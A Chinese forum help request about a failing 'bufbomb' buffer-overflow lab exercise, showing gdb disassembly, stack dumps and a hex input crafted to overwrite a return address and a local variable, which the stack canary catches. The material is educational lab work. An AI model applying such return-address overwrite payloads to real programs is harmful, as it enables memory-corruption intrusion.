- 论坛徽章:
- 0
|
这个我做了n天了,还没有解决,大家帮忙看下,谢谢:
(gdb) run
Starting program: /media/BACKUP/CProjects/bufbomb
Breakpoint 1, getbuf () at bufbomb.c:39
39 {
(gdb) cont
Continuing.
Breakpoint 3, getbuf () at bufbomb.c:41
41 getxs(buf); //断点设在第41行
(gdb) disassemble getbuf
Dump of assembler code for function getbuf: //getbuf的汇编代码
0x00000000004006aa <getbuf+0>: push %rbp
0x00000000004006ab <getbuf+1>: mov %rsp,%rbp
0x00000000004006ae <getbuf+4>: sub $0x20,%rsp //为getbuf栈帧分配32字节,buf起始地址为%rbp-0x20
0x00000000004006b2 <getbuf+8>: mov %fs:0x28,%rax
0x00000000004006bb <getbuf+17>: mov %rax,-0x8(%rbp)
0x00000000004006bf <getbuf+21>: xor %eax,%eax
0x00000000004006c1 <getbuf+23>: lea -0x20(%rbp),%rdi
0x00000000004006c5 <getbuf+27>: callq 0x4005c8 <getxs>
0x00000000004006ca <getbuf+32>: mov $0x1,%eax
0x00000000004006cf <getbuf+37>: mov -0x8(%rbp),%rdx
0x00000000004006d3 <getbuf+41>: xor %fs:0x28,%rdx
0x00000000004006dc <getbuf+50>: je 0x4006e3 <getbuf+57>
0x00000000004006de <getbuf+52>: callq 0x4004f8 <[email=__stack_chk_fail@plt]__stack_chk_fail@plt[/email]>
0x00000000004006e3 <getbuf+57>: leaveq
0x00000000004006e4 <getbuf+58>: retq
End of assembler dump.
(gdb) disassemble 0x400706 //0x400706是test调用getbuf后的返回地址
Dump of assembler code for function test: //test的汇编代码
0x00000000004006e5 <test+0>: push %rbp
0x00000000004006e6 <test+1>: mov %rsp,%rbp
0x00000000004006e9 <test+4>: sub $0x10,%rsp //test栈帧大小有16字节
0x00000000004006ed <test+8>: mov $0x400898,%edi
0x00000000004006f2 <test+13>: mov $0x0,%eax
0x00000000004006f7 <test+18>: callq 0x4004b8 <[email=printf@plt]printf@plt[/email]>
0x00000000004006fc <test+23>: mov $0x0,%eax
0x0000000000400701 <test+28>: callq 0x4006aa <getbuf>
0x0000000000400706 <test+33>: mov %eax,-0x4(%rbp) //0x400706
0x0000000000400709 <test+36>: mov -0x4(%rbp),%esi //%rbp-0x4应该是val的地址
0x000000000040070c <test+39>: mov $0x4008a9,%edi
0x0000000000400711 <test+44>: mov $0x0,%eax
0x0000000000400716 <test+49>: callq 0x4004b8 <[email=printf@plt]printf@plt[/email]>
0x000000000040071b <test+54>: leaveq
0x000000000040071c <test+55>: retq
End of assembler dump.
(gdb) p /x ($rbp)
$15 = 0x7fffbadfbfb0 //getbuf的%rbp
(gdb) p /x *(long*)($rbp)
$16 = 0x7fffbadfbfd0 //getbuf的%rbp指向的内容,即test的栈帧的%rbp
(gdb) p /x ($rbp-32)
$17 = 0x7fffbadfbf90 //buf起始地址
(gdb) x /32xg 0x7fffbadfbf90 //显示从buf起始处的内存
0x7fffbadfbf90: 0x0000000000400898 0x00007f62b2bdb2e0
0x7fffbadfbfa0: 0x00007f62b2bee580 0xff0a000000000000
0x7fffbadfbfb0: 0x00007fffbadfbfd0 0x0000000000400706 //0x400706为返回地址,见上文的test汇编代码
0x7fffbadfbfc0: 0x00007fffbadfc140 0x00007f62b2881924
0x7fffbadfbfd0: 0x00007fffbadfc1a0 0x000000000040078c
0x7fffbadfbfe0: 0x0000000000000000 0x00007fffbadfc000
0x7fffbadfbff0: 0x00007fffbadfc198 0x00007f62b2881b10
0x7fffbadfc000: 0x0000000000000000 0x00007f62b2dfb9d8
0x7fffbadfc010: 0x00007f62b2dfb4b0 0x0000000000400380
0x7fffbadfc020: 0x00007f62b288dfd8 0x00000000004002d8
0x7fffbadfc030: 0x0000000100000000 0x00000001000007b8
0x7fffbadfc040: 0x00007fffbadfc178 0x00007f62b2dfc358
0x7fffbadfc050: 0x00007fffbadfc1d0 0x00007fffbadfc180
0x7fffbadfc060: 0x00000000f63d4e2e 0x00007fffbadfc198
0x7fffbadfc070: 0x00007f62b2dfb9d8 0x00007f62b2be9c6f
0x7fffbadfc080: 0x0000000000000000 0x00007f62b2dfb9d8
(gdb) cont
Continuing. //向buf中输入数据
Type Hex string:3132333435363738 3940414243444546 4748495051525354 5556575859606162
d0bfdfbaff7f0000 0907400000000000 0000000000000000 00000000efbeadde
a0c1dfbaff7f0000 8c07400000000000
Breakpoint 2, getbuf () at bufbomb.c:42
42 return 1;
(gdb) x /32xg 0x7fffbadfbf90 //写入数据后的内存情况
0x7fffbadfbf90: 0x3837363534333231 0x4645444342414039 //可以看到buf刚才向buf中写入的数据
0x7fffbadfbfa0: 0x5453525150494847 0x6261605958575655
0x7fffbadfbfb0: 0x00007fffbadfbfd0 0x0000000000400709 //改变了返回地址为0x400709,见上文test汇编代码
0x7fffbadfbfc0: 0x0000000000000000 0xdeadbeef00000000 //更改val的内容为0xdeadbeef
0x7fffbadfbfd0: 0x00007fffbadfc1a0 0x000000000040078c
0x7fffbadfbfe0: 0x0000000000000000 0x00007fffbadfc000
0x7fffbadfbff0: 0x00007fffbadfc198 0x00007f62b2881b10
0x7fffbadfc000: 0x0000000000000000 0x00007f62b2dfb9d8
0x7fffbadfc010: 0x00007f62b2dfb4b0 0x0000000000400380
0x7fffbadfc020: 0x00007f62b288dfd8 0x00000000004002d8
0x7fffbadfc030: 0x0000000100000000 0x00000001000007b8
0x7fffbadfc040: 0x00007fffbadfc178 0x00007f62b2dfc358
0x7fffbadfc050: 0x00007fffbadfc1d0 0x00007fffbadfc180
0x7fffbadfc060: 0x00000000f63d4e2e 0x00007fffbadfc198
0x7fffbadfc070: 0x00007f62b2dfb9d8 0x00007f62b2be9c6f
0x7fffbadfc080: 0x0000000000000000 0x00007f62b2dfb9d8
(gdb) cont //但是,结果......
Continuing.
*** stack smashing detected ***: /media/BACKUP/CProjects/bufbomb terminated
======= Backtrace: =========
/lib/libc.so.6(__fortify_fail+0x37)[0x7f62b296b617]
/lib/libc.so.6(__fortify_fail+0x0)[0x7f62b296b5e0]
/media/BACKUP/CProjects/bufbomb[0x4006e3]
/media/BACKUP/CProjects/bufbomb[0x400709]
/media/BACKUP/CProjects/bufbomb[0x40078c]
/lib/libc.so.6(__libc_start_main+0xf4)[0x7f62b289c1c4]
/media/BACKUP/CProjects/bufbomb[0x400539]
======= Memory map: ========
00400000-00401000 r-xp 00000000 08:03 75 /media/BACKUP/CProjects/bufbomb
00600000-00601000 rw-p 00000000 08:03 75 /media/BACKUP/CProjects/bufbomb
00601000-00622000 rw-p 00601000 00:00 0 [heap]
7f62b2670000-7f62b267d000 r-xp 00000000 08:07 16914 /lib/libgcc_s.so.1
7f62b267d000-7f62b287d000 ---p 0000d000 08:07 16914 /lib/libgcc_s.so.1
7f62b287d000-7f62b287e000 rw-p 0000d000 08:07 16914 /lib/libgcc_s.so.1
7f62b287e000-7f62b29d6000 r-xp 00000000 08:07 16993 /lib/libc-2.7.so
7f62b29d6000-7f62b2bd6000 ---p 00158000 08:07 16993 /lib/libc-2.7.so
7f62b2bd6000-7f62b2bd9000 r--p 00158000 08:07 16993 /lib/libc-2.7.so
7f62b2bd9000-7f62b2bdb000 rw-p 0015b000 08:07 16993 /lib/libc-2.7.so
7f62b2bdb000-7f62b2be0000 rw-p 7f62b2bdb000 00:00 0
7f62b2be0000-7f62b2bfd000 r-xp 00000000 08:07 16990 /lib/ld-2.7.so
7f62b2de5000-7f62b2de7000 rw-p 7f62b2de5000 00:00 0
7f62b2df8000-7f62b2dfd000 rw-p 7f62b2df8000 00:00 0
7f62b2dfd000-7f62b2dff000 rw-p 0001d000 08:07 16990 /lib/ld-2.7.so
7fffbade9000-7fffbadfe000 rw-p 7ffffffea000 00:00 0 [stack]
7fffbadfe000-7fffbae00000 r-xp 7fffbadfe000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
Program received signal SIGABRT, Aborted.
0x00007f62b28b0095 in raise () from /lib/libc.so.6
(gdb)
环境:Ubuntu 8.04, 内核:Linux 2.6.24-21-generic
gcc版本:
gcc (GCC) 4.2.4 (Ubuntu 4.2.4-1ubuntu1)
Copyright (C) 2007 Free Software Foundation, Inc.
是不是64位的汇编可以检测出缓冲区溢出啊,谁知道帮我一下,先谢谢大家了! |
|